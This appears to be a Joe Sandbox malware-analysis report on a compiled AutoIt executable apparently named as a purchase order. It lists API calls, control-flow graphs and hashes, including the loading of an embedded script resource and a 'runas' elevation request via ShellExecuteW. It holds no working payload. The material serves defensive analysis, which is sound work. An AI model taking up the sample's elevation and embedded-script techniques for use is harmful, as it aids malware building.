97490 4d2d5e 97488->97490 97559 493084 22 API calls 97490->97559 97492 492f4b 97544 4b4a28 40 API calls 3 library calls 97492->97544 97493 4d2d6d 97497 49a8c7 22 API calls 97493->97497 97495 492f59 97495->97470 97496 492f63 97495->97496 97545 4b4a28 40 API calls 3 library calls 97496->97545 97499 4d2d83 97497->97499 97560 493084 22 API calls 97499->97560 97500 492f6e 97500->97475 97502 492f78 97500->97502 97546 4b4a28 40 API calls 3 library calls 97502->97546 97503 4d2d90 97505 492f83 97505->97479 97506 492f8d 97505->97506 97547 4b4a28 40 API calls 3 library calls 97506->97547 97508 492f98 97509 492fdc 97508->97509 97548 493084 22 API calls 97508->97548 97509->97493 97510 492fe8 97509->97510 97510->97503 97550 4963eb 22 API calls 97510->97550 97512 492fbf 97514 49a8c7 22 API calls 97512->97514 97516 492fcd 97514->97516 97515 492ff8 97551 496a50 22 API calls 97515->97551 97549 493084 22 API calls 97516->97549 97519 493006 97552 4970b0 23 API calls 97519->97552 97523 493021 97524 493065 97523->97524 97553 496f88 22 API calls 97523->97553 97554 4970b0 23 API calls 97523->97554 97555 493084 22 API calls 97523->97555 97527 494af0 __wsopen_s 97526->97527 97528 496b57 22 API calls 97527->97528 97529 494b22 97527->97529 97528->97529 97530 494c6d 22 API calls 97529->97530 97538 494b58 97529->97538 97530->97529 97531 499cb3 22 API calls 97533 494c52 97531->97533 97532 499cb3 22 API calls 97532->97538 97534 49515f 22 API calls 97533->97534 97536 494c5e 97534->97536 97535 49515f 22 API calls 97535->97538 97536->97451 97537 494c29 97537->97531 97537->97536 97538->97532 97538->97535 97538->97537 97539 494c6d 22 API calls 97538->97539 97539->97538 97540->97467 97541->97474 97542->97482 97543->97492 97544->97495 97545->97500 97546->97505 97547->97508 97548->97512 97549->97509 97550->97515 97551->97519 97552->97523 97553->97523 97554->97523 97555->97523 97556->97475 97557->97479 97558->97486 97559->97493 97560->97503 97561 493156 97564 493170 97561->97564 97565 493187 97564->97565 97566 4931eb 97565->97566 97567 49318c 97565->97567 97604 4931e9 97565->97604 97569 4d2dfb 97566->97569 97570 4931f1 97566->97570 97571 493199 97567->97571 97572 493265 PostQuitMessage 97567->97572 97568 4931d0 DefWindowProcW 97606 49316a 97568->97606 97613 4918e2 10 API calls 97569->97613 97573 4931f8 97570->97573 97574 49321d SetTimer RegisterWindowMessageW 97570->97574 97576 4d2e7c 97571->97576 97577 4931a4 97571->97577 97572->97606 97579 4d2d9c 97573->97579 97580 493201 KillTimer 97573->97580 97582 493246 CreatePopupMenu 97574->97582 97574->97606 97618 4fbf30 34 API calls ___scrt_fastfail 97576->97618 97583 4d2e68 97577->97583 97584 4931ae 97577->97584 97588 4d2dd7 MoveWindow 97579->97588 97589 4d2da1 97579->97589 97609 4930f2 Shell_NotifyIconW ___scrt_fastfail 97580->97609 97581 4d2e1c 97614 4ae499 42 API calls 97581->97614 97582->97606 97617 4fc161 27 API calls ___scrt_fastfail 97583->97617 97585 4d2e4d 97584->97585 97586 4931b9 97584->97586 97585->97568 97616 4f0ad7 22 API calls 97585->97616 97593 4931c4 97586->97593 97594 493253 97586->97594 97587 4d2e8e 97587->97568 97587->97606 97588->97606 97595 4d2da7 97589->97595 97596 4d2dc6 SetFocus 97589->97596 97593->97568 97615 4930f2 Shell_NotifyIconW ___scrt_fastfail 97593->97615 97611 49326f 44 API calls ___scrt_fastfail 97594->97611 97595->97593 97600 4d2db0 97595->97600 97596->97606 97597 493214 97610 493c50 DeleteObject DestroyWindow 97597->97610 97598 493263 97598->97606 97612 4918e2 10 API calls 97600->97612 97604->97568 97607 4d2e41 97608 493837 49 API calls 97607->97608 97608->97604 97609->97597 97610->97606 97611->97598 97612->97606 97613->97581 97614->97593 97615->97607 97616->97604 97617->97598 97618->97587

                                      Executed Functions

                                      Function 004942DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 234 4942de-49434d call 49a961 GetVersionExW call 496b57 239 4d3617-4d362a 234->239 240 494353 234->240 242 4d362b-4d362f 239->242 241 494355-494357 240->241 243 49435d-4943bc call 4993b2 call 4937a0 241->243 244 4d3656 241->244 245 4d3631 242->245 246 4d3632-4d363e 242->246 263 4d37df-4d37e6 243->263 264 4943c2-4943c4 243->264 249 4d365d-4d3660 244->249 245->246 246->242 248 4d3640-4d3642 246->248 248->241 251 4d3648-4d364f 248->251 252 49441b-494435 GetCurrentProcess IsWow64Process 249->252 253 4d3666-4d36a8 249->253 251->239 255 4d3651 251->255 258 494494-49449a 252->258 259 494437 252->259 253->252 256 4d36ae-4d36b1 253->256 255->244 261 4d36db-4d36e5 256->261 262 4d36b3-4d36bd 256->262 260 49443d-494449 258->260 259->260 265 49444f-49445e LoadLibraryA 260->265 266 4d3824-4d3828 GetSystemInfo 260->266 270 4d36f8-4d3702 261->270 271 4d36e7-4d36f3 261->271 267 4d36bf-4d36c5 262->267 268 4d36ca-4d36d6 262->268 272 4d37e8 263->272 273 4d3806-4d3809 263->273 264->249 269 4943ca-4943dd 264->269 274 49449c-4944a6 GetSystemInfo 265->274 275 494460-49446e GetProcAddress 265->275 267->252 268->252 276 4943e3-4943e5 269->276 277 4d3726-4d372f 269->277 279 4d3715-4d3721 270->279 280 4d3704-4d3710 270->280 271->252 278 4d37ee 272->278 281 4d380b-4d381a 273->281 282 4d37f4-4d37fc 273->282 285 494476-494478 274->285 275->274 284 494470-494474 GetNativeSystemInfo 275->284 286 4d374d-4d3762 276->286 287 4943eb-4943ee 276->287 288 4d373c-4d3748 277->288 289 4d3731-4d3737 277->289 278->282 279->252 280->252 281->278 283 4d381c-4d3822 281->283 282->273 283->282 284->285 292 49447a-49447b FreeLibrary 285->292 293 494481-494493 285->293 290 4d376f-4d377b 286->290 291 4d3764-4d376a 286->291 294 4d3791-4d3794 287->294 295 4943f4-49440f 287->295 288->252 289->252 290->252 291->252 292->293 294->252 296 4d379a-4d37c1 294->296 297 494415 295->297 298 4d3780-4d378c 295->298 299 4d37ce-4d37da 296->299 300 4d37c3-4d37c9 296->300 297->252 298->252 299->252 300->252
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0049430D
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • GetCurrentProcess.KERNEL32(?,0052CB64,00000000,?,?), ref: 00494422
                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00494429
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00494454
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00494466
                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00494474
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0049447B
                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 004944A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                      • API String ID: 3290436268-3101561225
                                      • Opcode ID: 7ca8611100ac370cd75456db4ade91de4ff80124fe3ab8cdffa3735d6943cad9
                                      • Instruction ID: 97c38c3ff7e41e587d87968f86bd33cc299025d8841e40491185eb582f355be7
                                      • Opcode Fuzzy Hash: 7ca8611100ac370cd75456db4ade91de4ff80124fe3ab8cdffa3735d6943cad9
                                      • Instruction Fuzzy Hash: A4A1A761B0AAD0CFCB11CB6DBD415B57FA46B76340B1C4CABD04397722D6A8450EEB2E
                                      Function 004942A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1378 4942a2-4942ba CreateStreamOnHGlobal 1379 4942da-4942dd 1378->1379 1380 4942bc-4942d3 FindResourceExW 1378->1380 1381 4942d9 1380->1381 1382 4d35ba-4d35c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 4d35cf-4d35dd SizeofResource 1382->1383 1383->1381 1384 4d35e3-4d35ee LockResource 1383->1384 1384->1381 1385 4d35f4-4d3612 1384->1385 1385->1381
                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004950AA,?,?,00000000,00000000), ref: 004942B2
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004950AA,?,?,00000000,00000000), ref: 004942C9
                                      • LoadResource.KERNEL32(?,00000000,?,?,004950AA,?,?,00000000,00000000,?,?,?,?,?,?,00494F20), ref: 004D35BE
                                      • SizeofResource.KERNEL32(?,00000000,?,?,004950AA,?,?,00000000,00000000,?,?,?,?,?,?,00494F20), ref: 004D35D3
                                      • LockResource.KERNEL32(004950AA,?,?,004950AA,?,?,00000000,00000000,?,?,?,?,?,?,00494F20,?), ref: 004D35E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: f7a689cf4bc32cbdf50a56ffc9e1788228f291d2c52f61a99ed25537bdc22446
                                      • Instruction ID: a4fa8c44bdc7af9e7ba7a526cb4e76da6d00b2a5170d6cad5f4529fd57ea3d59
                                      • Opcode Fuzzy Hash: f7a689cf4bc32cbdf50a56ffc9e1788228f291d2c52f61a99ed25537bdc22446
                                      • Instruction Fuzzy Hash: 07117C74200700FFEB258B65DC48F2B7FB9FFD6B91F2081AAF40296290DB71D8069620
                                      Function 004D2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00492B6B
                                        • Part of subcall function 00493A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00561418,?,00492E7F,?,?,?,00000000), ref: 00493A78
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00552224), ref: 004D2C10
                                      • ShellExecuteW.SHELL32(00000000,?,?,00552224), ref: 004D2C17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                      • String ID: runas
                                      • API String ID: 448630720-4000483414
                                      • Opcode ID: 0c6ee2ccee0d90a8b0dbf84bbd471a9ccf2961f56748b08e8aedbefe41148655
                                      • Instruction ID: 161c07e487ba8d61d2e8f2b77e0026c0e0fde7f48322d30c7b3b1ddda819e104
                                      • Opcode Fuzzy Hash: 0c6ee2ccee0d90a8b0dbf84bbd471a9ccf2961f56748b08e8aedbefe41148655
                                      • Instruction Fuzzy Hash: 5711C0311083016ACF14FF65D96197E7FE4AFA274AF48043FF542431A2DFA99A0AD71A
                                      Function 004FDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,004D5222), ref: 004FDBCE
                                      • GetFileAttributesW.KERNELBASE(?), ref: 004FDBDD
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 004FDBEE
                                      • FindClose.KERNEL32(00000000), ref: 004FDBFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                      • String ID:
                                      • API String ID: 2695905019-0
                                      • Opcode ID: 5e1aed7ba78c9829e3937238957cd4ba210a6bac7449aeb6f5098287e26f4636
                                      • Instruction ID: 0b49f9d4c9b3b079279f5091897f534552a6cac079f4fb3288d296db65bcdd74
                                      • Opcode Fuzzy Hash: 5e1aed7ba78c9829e3937238957cd4ba210a6bac7449aeb6f5098287e26f4636
                                      • Instruction Fuzzy Hash: 16F0A0308109189782306B78AC0E8BF3B6D9F62334B104703F9B6C21E1EBB4595AD6DA
                                      Function 0049BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: p#V
                                      • API String ID: 3964851224-2534486754
                                      • Opcode ID: f1d5b166aba7e72027e43bd60797274f15ca3d613ead11713c2c1f92a3108ba0
                                      • Instruction ID: 114ff20517d25703b8d588c9b8e4634df854737b211d552e0d2f3a29a7d3fbc4
                                      • Opcode Fuzzy Hash: f1d5b166aba7e72027e43bd60797274f15ca3d613ead11713c2c1f92a3108ba0
                                      • Instruction Fuzzy Hash: 1FA26E706083419FDB10DF15C480B2BBBE1BF99304F14896EE89A9B352D779EC45CB9A
                                      Function 0049D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetInputState.USER32 ref: 0049D807
                                      • timeGetTime.WINMM ref: 0049DA07
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049DB28
                                      • TranslateMessage.USER32(?), ref: 0049DB7B
                                      • DispatchMessageW.USER32(?), ref: 0049DB89
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049DB9F
                                      • Sleep.KERNEL32(0000000A), ref: 0049DBB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                      • String ID:
                                      • API String ID: 2189390790-0
                                      • Opcode ID: 333d7419845b73e7dc64abe0dcbdf688c7aa36d1496095eb0435ec5f1e3e1a96
                                      • Instruction ID: 7bc13bceb9c0fcb934bf34a86c4ca66a8e828cbf991dbaaa4dae8331d4468341
                                      • Opcode Fuzzy Hash: 333d7419845b73e7dc64abe0dcbdf688c7aa36d1496095eb0435ec5f1e3e1a96
                                      • Instruction Fuzzy Hash: 24420370A04681DFDB38DF25C844B6ABBE4BF56304F14462FE45687391D7B8E849CB8A
                                      Function 00492CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00492D07
                                      • RegisterClassExW.USER32(00000030), ref: 00492D31
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00492D42
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00492D5F
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00492D6F
                                      • LoadIconW.USER32(000000A9), ref: 00492D85
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00492D94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 110e555ec09d25b415466ad733b5d31bc71e0ba2f766557d0fca0cb1ef022ac2
                                      • Instruction ID: 224dd4db3da47121bdcd6dae6fc184e8a152f396600508a8a99fc49a791f8a31
                                      • Opcode Fuzzy Hash: 110e555ec09d25b415466ad733b5d31bc71e0ba2f766557d0fca0cb1ef022ac2
                                      • Instruction Fuzzy Hash: 6A21E3B1901618AFDB10DFA8E849BEDBFB4FB29701F04811AF511A72A0D7B10548EF95
                                      Function 004C8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 302 4c8d45-4c8d55 303 4c8d6f-4c8d71 302->303 304 4c8d57-4c8d6a call 4bf2c6 call 4bf2d9 302->304 306 4c90d9-4c90e6 call 4bf2c6 call 4bf2d9 303->306 307 4c8d77-4c8d7d 303->307 320 4c90f1 304->320 326 4c90ec call 4c27ec 306->326 307->306 310 4c8d83-4c8dae 307->310 310->306 313 4c8db4-4c8dbd 310->313 316 4c8dbf-4c8dd2 call 4bf2c6 call 4bf2d9 313->316 317 4c8dd7-4c8dd9 313->317 316->326 318 4c8ddf-4c8de3 317->318 319 4c90d5-4c90d7 317->319 318->319 324 4c8de9-4c8ded 318->324 325 4c90f4-4c90f9 319->325 320->325 324->316 328 4c8def-4c8e06 324->328 326->320 331 4c8e08-4c8e0b 328->331 332 4c8e23-4c8e2c 328->332 333 4c8e0d-4c8e13 331->333 334 4c8e15-4c8e1e 331->334 335 4c8e2e-4c8e45 call 4bf2c6 call 4bf2d9 call 4c27ec 332->335 336 4c8e4a-4c8e54 332->336 333->334 333->335 339 4c8ebf-4c8ed9 334->339 364 4c900c 335->364 337 4c8e5b-4c8e79 call 4c3820 call 4c29c8 * 2 336->337 338 4c8e56-4c8e58 336->338 373 4c8e7b-4c8e91 call 4bf2d9 call 4bf2c6 337->373 374 4c8e96-4c8ebc call 4c9424 337->374 338->337 341 4c8fad-4c8fb6 call 4cf89b 339->341 342 4c8edf-4c8eef 339->342 353 4c8fb8-4c8fca 341->353 354 4c9029 341->354 342->341 345 4c8ef5-4c8ef7 342->345 345->341 349 4c8efd-4c8f23 345->349 349->341 356 4c8f29-4c8f3c 349->356 353->354 358 4c8fcc-4c8fdb GetConsoleMode 353->358 362 4c902d-4c9045 ReadFile 354->362 356->341 360 4c8f3e-4c8f40 356->360 358->354 363 4c8fdd-4c8fe1 358->363 360->341 365 4c8f42-4c8f6d 360->365 367 4c9047-4c904d 362->367 368 4c90a1-4c90ac GetLastError 362->368 363->362 370 4c8fe3-4c8ffd ReadConsoleW 363->370 371 4c900f-4c9019 call 4c29c8 364->371 365->341 372 4c8f6f-4c8f82 365->372 367->368 369 4c904f 367->369 375 4c90ae-4c90c0 call 4bf2d9 call 4bf2c6 368->375 376 4c90c5-4c90c8 368->376 378 4c9052-4c9064 369->378 380 4c901e-4c9027 370->380 381 4c8fff GetLastError 370->381 371->325 372->341 385 4c8f84-4c8f86 372->385 373->364 374->339 375->364 382 4c90ce-4c90d0 376->382 383 4c9005-4c900b call 4bf2a3 376->383 378->371 388 4c9066-4c906a 378->388 380->378 381->383 382->371 383->364 385->341 392 4c8f88-4c8fa8 385->392 395 4c906c-4c907c call 4c8a61 388->395 396 4c9083-4c908e 388->396 392->341 407 4c907f-4c9081 395->407 401 4c909a-4c909f call 4c88a1 396->401 402 4c9090 call 4c8bb1 396->402 408 4c9095-4c9098 401->408 402->408 407->371 408->407
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .K
                                      • API String ID: 0-1219020502
                                      • Opcode ID: 3180716a972957932cfec10eccb90ea82651cb0eb1fd48897135eff960b4698c
                                      • Instruction ID: 8e647bc8caf4af1242bc2071a9fb9490b4d14e78aa0aeec602b25d58401f48fa
                                      • Opcode Fuzzy Hash: 3180716a972957932cfec10eccb90ea82651cb0eb1fd48897135eff960b4698c
                                      • Instruction Fuzzy Hash: 52C10378904249AFCB51DFAAC845FEEBFB0AF19310F04409EE414A7392C7798D42CB69
                                      Function 004D065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 410 4d065b-4d068b call 4d042f 413 4d068d-4d0698 call 4bf2c6 410->413 414 4d06a6-4d06b2 call 4c5221 410->414 419 4d069a-4d06a1 call 4bf2d9 413->419 420 4d06cb-4d0714 call 4d039a 414->420 421 4d06b4-4d06c9 call 4bf2c6 call 4bf2d9 414->421 430 4d097d-4d0983 419->430 428 4d0716-4d071f 420->428 429 4d0781-4d078a GetFileType 420->429 421->419 432 4d0756-4d077c GetLastError call 4bf2a3 428->432 433 4d0721-4d0725 428->433 434 4d078c-4d07bd GetLastError call 4bf2a3 CloseHandle 429->434 435 4d07d3-4d07d6 429->435 432->419 433->432 439 4d0727-4d0754 call 4d039a 433->439 434->419 449 4d07c3-4d07ce call 4bf2d9 434->449 437 4d07df-4d07e5 435->437 438 4d07d8-4d07dd 435->438 442 4d07e9-4d0837 call 4c516a 437->442 443 4d07e7 437->443 438->442 439->429 439->432 453 4d0839-4d0845 call 4d05ab 442->453 454 4d0847-4d086b call 4d014d 442->454 443->442 449->419 453->454 459 4d086f-4d0879 call 4c86ae 453->459 460 4d086d 454->460 461 4d087e-4d08c1 454->461 459->430 460->459 463 4d08c3-4d08c7 461->463 464 4d08e2-4d08f0 461->464 463->464 466 4d08c9-4d08dd 463->466 467 4d097b 464->467 468 4d08f6-4d08fa 464->468 466->464 467->430 468->467 469 4d08fc-4d092f CloseHandle call 4d039a 468->469 472 4d0931-4d095d GetLastError call 4bf2a3 call 4c5333 469->472 473 4d0963-4d0977 469->473 472->473 473->467
                                      APIs
                                        • Part of subcall function 004D039A: CreateFileW.KERNELBASE(00000000,00000000,?,004D0704,?,?,00000000,?,004D0704,00000000,0000000C), ref: 004D03B7
                                      • GetLastError.KERNEL32 ref: 004D076F
